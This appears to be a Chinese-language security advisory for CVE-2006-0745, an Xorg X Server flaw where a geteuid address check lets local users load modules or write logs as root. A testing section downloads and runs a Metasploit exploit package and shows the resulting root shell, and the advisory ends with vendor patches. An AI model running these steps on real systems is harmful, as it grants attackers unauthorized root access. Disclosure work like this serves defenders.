发布日期：2006-03-20
更新日期：2006-03-21

受影响系统：

Sun Solaris 10_x86
X.org X11R6 7.0
X.org X11R6 6.9.0

描述：

---

BUGTRAQ  ID: 17169
CVE(CAN) ID: CVE-2006-0745

Xorg X Server是Solaris x86平台上可用的X窗口系统显示服务器之一。

Xorg X Server实现上存在设计错误，本地攻击者可能利用此漏洞提升自己的权限。

在解析参数时，X Server检查了只有root用户才可以传送-modulepath和-logfile选项。这两个选项分别用于判断模块加载和日志文件的位置，正常情况下非特权用户无法更改这些位置。但上述检查只测试了geteuid函数的地址而不是函数结果本身，因此如果geteuid()的地址不是0的话，非特权用户就可以以root权限在文件系统中的任意位置加载模块，或用服务器日志覆盖重要的系统文件。

<*来源：H D Moore （hdm@metasploit.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=114289085719090&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=114288053928181&w=2
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102252-1
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz
$ tar -zpxvf xmodulepath.tgz
$ cd xmodulepath
$ ./root.sh
/bin/rm -f   exploit.o exploit.so shell *.o *.so
gcc -fPIC -c exploit.c
gcc -shared -nostdlib exploit.o -o exploit.so
gcc -o shell shell.c

X Window System Version 7.0.0
Release Date: 21 December 2005
X Protocol Version 11, Revision 0, Release 7.0
[ snip ]
r00t # id
uid=0(root) gid=100(users) groups=10(wheel),18(audio)...

建议：

---

厂商补丁：

Sun
---
Sun已经为此发布了一个安全公告（Sun-Alert-102252）以及相应补丁:
Sun-Alert-102252：Security Vulnerabilities found in the Xorg(1) X11R6.9 and X11R7.0 Server
链接：http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102252-1

补丁下载：
http://sunsolve.sun.com/tpatches

X.org
-----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

* X.org x11r6.9.0-geteuid.diff
http://xorg.freedesktop.org/releases/X11R6.9.0/patches/

* X.org xorg-server-1.0.2.tar.gz
http://xorg.freedesktop.org/releases/individual/xserver/

浏览次数：3628
严重程度：0（网友投票）